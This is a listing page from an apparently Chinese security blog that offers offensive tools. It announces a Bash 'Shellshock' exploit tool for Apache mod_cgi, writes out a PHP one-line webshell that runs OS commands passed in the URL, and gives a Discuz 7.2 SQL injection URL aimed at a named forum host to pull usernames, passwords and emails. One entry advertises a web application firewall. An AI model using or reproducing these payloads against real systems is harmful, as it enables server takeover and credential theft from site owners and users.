• 1
预览模式: 普通 | 列表

2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。根据目前的漏洞验证情况以及已经流传的POC情况,这个漏洞将严重影响网络基础设施的安全,包括但不限于网络设备、网络安全设备、云和大数据中心等。特别是Bash广泛地分布和存在于设备中,其消除过程将非常长尾,且易于利用其编写蠕虫进行自动化传播,同时也将导致僵尸网络的发展,目前已有多个境外安全机构发出了警告。

 

 『河马』apache mod_cgi bash 命令注入漏洞利用工具v2.0(解压密码 isafe.cc).rar

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 5420

河马web应用防火墙



“河马web应用防火墙”网站保护系统能够为社区内的网站提供一站式的安全解决方案,使网站在“零部署”、
“零维护”的情况下,防止诸如XSS、SQL注入、木马、零日攻击、僵尸网络等各种网站安全问题。同时,“河
马web应用防火墙”综合采用跨运营商智能调度、页面优化、页面缓存等技术,进一步提升访问速度,降低故障
率,从而整体提升网站的用户体验。在将来,“河马web应用防火墙”将进一步以云计算为基础,专注于“后

查看更多...

Tags: waf

分类:Web应用防火墙 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3650

『河马』apache mod_cgi bash 命令注入漏洞



2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以
产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。
河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平
台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2340


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3238

discuz_7.2_faq.php_注入漏洞利用工具 POC
http://bbs.dianjian.net//faq.php?action=
grouppermission&gids[99]=%27&gids[100]
[0]=)%20and%20(select%201%20from%20
(select%20count(*),concat((select%20(select%20(select%20concat(username,0x23,password,0x23,email)%20f

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2708
  • 1
无标题文档